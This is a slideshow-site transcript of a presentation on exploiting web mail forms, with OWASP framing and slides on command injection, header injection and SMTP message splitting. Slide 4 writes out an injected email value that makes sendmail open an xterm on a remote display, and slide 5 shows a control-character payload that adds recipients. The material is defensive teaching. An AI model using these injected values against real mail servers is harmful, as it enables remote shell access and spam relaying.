1 / 6

Avoiding Backend Exploitation of Mail Forms

Max Kessler, LPIC-1. Avoiding Backend Exploitation of Mail Forms. OWASP Top 10 List. #1 Unvalidated user input #2 Broken access control (sort of) #6 Injection flaws. How do mail forms work?. A user types in their name, address and a message.

isabel
Download Presentation

Avoiding Backend Exploitation of Mail Forms

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Max Kessler, LPIC-1 Avoiding BackendExploitation of Mail Forms

  2. OWASP Top 10 List • #1 Unvalidated user input • #2 Broken access control (sort of) • #6 Injection flaws

  3. How do mail forms work? • A user types in their name, address and a message. • Their data are sent to the web server in an HTTP request. • The server runs a script that formats the text for consumption by a mail server, then feeds it to the mail server.

  4. User input on the command line Exploit 1: insert semicolon/ampersand The command should be: /bin/sh /usr/sbin/sendmail -f max@example.com \ user1@example.com The command is: /bin/sh /usr/sbin/sendmail -f max@example.com& \ xterm -display 192.168.0.201:0&echo \ user1@example.com

  5. Replay with control characters Exploit 2: insert control characters E-mail address should be: max@example.com E-mail address is: max@example.com To: user2@example.com, user3@example.com

  6. Starting a new message Exploit 3: using '.' to start a new message SMTP servers allow multiple messages to be sent through a single connection. A new message is started by putting a '.' on a line by itself.

More Related